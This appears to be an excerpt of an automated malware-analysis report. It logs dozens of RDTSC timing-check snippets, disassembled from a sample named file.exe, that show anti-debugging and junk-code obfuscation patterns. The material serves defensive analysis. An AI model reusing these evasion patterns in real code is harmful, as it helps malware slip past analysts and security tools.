                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A068 second address: 75A08F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8387h 0x00000007 jc 00007F701CDC8382h 0x0000000d jno 00007F701CDC8376h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D1E7 second address: 75D1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D1EB second address: 75D2D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F701CDC8384h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jo 00007F701CDC838Ch 0x0000001c jmp 00007F701CDC8386h 0x00000021 pop ebx 0x00000022 mov eax, dword ptr [eax] 0x00000024 js 00007F701CDC8382h 0x0000002a jg 00007F701CDC837Ch 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push ecx 0x00000035 jmp 00007F701CDC837Dh 0x0000003a pop ecx 0x0000003b pop eax 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D18C2h], eax 0x00000044 push 00000000h 0x00000046 mov esi, dword ptr [ebp+122D2A17h] 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D2CA3h] 0x00000054 sub dx, BCFBh 0x00000059 call 00007F701CDC8379h 0x0000005e push eax 0x0000005f jmp 00007F701CDC837Fh 0x00000064 pop eax 0x00000065 push eax 0x00000066 jmp 00007F701CDC8384h 0x0000006b mov eax, dword ptr [esp+04h] 0x0000006f jmp 00007F701CDC8380h 0x00000074 mov eax, dword ptr [eax] 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F701CDC8387h 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D2D0 second address: 75D2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D2DA second address: 75D2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D2DE second address: 75D352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F701CDA8A79h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F701CDA8A68h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c and dl, FFFFFFD4h 0x0000002f jmp 00007F701CDA8A73h 0x00000034 lea ebx, dword ptr [ebp+1244F0D6h] 0x0000003a xor esi, dword ptr [ebp+122D2A3Fh] 0x00000040 xchg eax, ebx 0x00000041 jg 00007F701CDA8A74h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D410 second address: 75D443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D29D7h] 0x00000017 push 00000000h 0x00000019 mov ecx, edi 0x0000001b call 00007F701CDC8379h 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D443 second address: 75D494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F701CDA8A72h 0x00000008 jne 00007F701CDA8A66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F701CDA8A74h 0x00000018 pushad 0x00000019 jnp 00007F701CDA8A66h 0x0000001f jnp 00007F701CDA8A66h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b jc 00007F701CDA8A74h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D494 second address: 75D498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D498 second address: 75D53F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jo 00007F701CDA8A6Eh 0x0000000e jc 00007F701CDA8A68h 0x00000014 pushad 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnl 00007F701CDA8A6Eh 0x00000020 pop eax 0x00000021 xor esi, 07F5B91Ch 0x00000027 push 00000003h 0x00000029 jmp 00007F701CDA8A73h 0x0000002e push 00000000h 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D1C12h], eax 0x00000038 mov esi, dword ptr [ebp+122D2B27h] 0x0000003e push A479E08Ah 0x00000043 push edi 0x00000044 pushad 0x00000045 jmp 00007F701CDA8A72h 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c popad 0x0000004d pop edi 0x0000004e add dword ptr [esp], 1B861F76h 0x00000055 xor esi, dword ptr [ebp+122D2A97h] 0x0000005b lea ebx, dword ptr [ebp+1244F0DFh] 0x00000061 call 00007F701CDA8A72h 0x00000066 sub si, EDFFh 0x0000006b pop ecx 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F701CDA8A68h 0x00000075 push ecx 0x00000076 pop ecx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5D0 second address: 75D5DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5DA second address: 75D5DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5DF second address: 75D602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jg 00007F701CDC837Ch 0x0000000e push 00000000h 0x00000010 mov si, bx 0x00000013 push F1F24E8Fh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D602 second address: 75D606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D606 second address: 75D664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 0E0DB1F1h 0x00000011 mov dword ptr [ebp+122D27F9h], esi 0x00000017 push 00000003h 0x00000019 sub dword ptr [ebp+1244A8DEh], eax 0x0000001f push 00000000h 0x00000021 or dh, 0000002Eh 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F701CDC8378h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 clc 0x00000041 push 5CC3C9C1h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D664 second address: 75D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D669 second address: 75D6AF instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC837Ch 0x00000008 jbe 00007F701CDC8376h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 633C363Fh 0x00000017 lea ebx, dword ptr [ebp+1244F0EAh] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F701CDC8378h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D6AF second address: 75D6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D6B3 second address: 75D6BD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DFA0 second address: 77DFB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F701CDA8A88h 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF44 second address: 77BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF48 second address: 77BF7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A78h 0x00000007 jmp 00007F701CDA8A73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF7F second address: 77BF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF85 second address: 77BF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F701CDA8A68h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C297 second address: 77C2BA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 jmp 00007F701CDC8381h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F701CDC837Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6B0 second address: 77C6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6B5 second address: 77C6BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC837Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CFEF second address: 77D03C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A79h 0x00000007 jbe 00007F701CDA8A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007F701CDA8A6Fh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jmp 00007F701CDA8A74h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D736 second address: 77D749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC837Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D749 second address: 77D754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D754 second address: 77D758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D758 second address: 77D75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE32 second address: 77DE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78214A second address: 78217D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c js 00007F701CDA8A7Bh 0x00000012 pushad 0x00000013 jnl 00007F701CDA8A66h 0x00000019 jmp 00007F701CDA8A6Dh 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jnc 00007F701CDA8A74h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78217D second address: 782181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782261 second address: 782265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782265 second address: 78226B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7835D4 second address: 7835E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A71h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F361 second address: 74F37F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F701CDC8387h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F37F second address: 74F3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F701CDA8A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDA8A72h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74351D second address: 74352B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74352B second address: 743551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F701CDA8A68h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007F701CDA8A72h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743551 second address: 743555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743555 second address: 743559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A362 second address: 78A37A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A37A second address: 78A3A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A79h 0x00000007 jp 00007F701CDA8A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3A0 second address: 78A3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3A6 second address: 78A3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F701CDA8A66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3B1 second address: 78A3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A51E second address: 78A522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A522 second address: 78A540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A540 second address: 78A546 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743541 second address: 743547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743547 second address: 743551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B303 second address: 78B307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B307 second address: 78B30D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B92C second address: 78B932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B932 second address: 78B936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B936 second address: 78B95E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007F701CDC8384h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BFB5 second address: 78BFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F701CDA8A68h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C129 second address: 78C12F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C12F second address: 78C133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C133 second address: 78C145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F701CDC8376h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C943 second address: 78C94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E422 second address: 78E426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E426 second address: 78E42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DC41 second address: 78DC5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F701CDC837Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFAE second address: 78EFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFB8 second address: 78EFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFBC second address: 78F007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F701CDA8A68h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, ebx 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1BF3h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jmp 00007F701CDA8A6Ah 0x0000003a pop edi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F007 second address: 78F00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790467 second address: 7904AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F701CDA8A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+1244BAB2h], ecx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2190h] 0x0000001c pushad 0x0000001d js 00007F701CDA8A6Bh 0x00000023 xor dl, FFFFFFDEh 0x00000026 popad 0x00000027 push 00000000h 0x00000029 mov di, dx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push ecx 0x0000002f jg 00007F701CDA8A66h 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F701CDA8A66h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792626 second address: 79263E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8384h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79263E second address: 79264D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79264D second address: 792651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792651 second address: 792657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792657 second address: 79265D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79265D second address: 792661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790D04 second address: 790D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
